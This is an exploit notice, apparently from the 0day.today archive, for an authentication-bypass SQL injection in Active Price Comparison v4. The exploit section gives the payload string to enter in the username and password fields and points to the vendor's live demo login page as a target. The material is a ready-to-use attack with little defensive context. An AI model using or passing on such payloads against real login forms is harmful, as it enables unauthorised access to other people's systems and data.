id: 4305
date: 11/29/2008
title: Active Price Comparison 4 (Auth Bypass) SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

===================================================================
Active Price Comparison 4 (Auth Bypass) SQL Injection Vulnerability
===================================================================


[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~]Vendor:www.activewebsoftwares.com
   
 [~]Software: Active Price Comparison v 4
   
 [~] Date: 28.11.2008
   
 [~] Home: www.ahacker.biz
   
 [~] contact: N/A

[~] -----------------------------------------------------------
   
   
 [~] Exploit:
   
  username: r0' or ' 1=1--
  password: r0' or ' 1=1--
   
   
 [~]login 4 d3m0:
   
  http://www.activewebsoftwares.com/demoactivepricecomparison/login.aspx?
 
 [~]--------------------------------------------------------------------------------



#  0day.today [2023-03-25]  #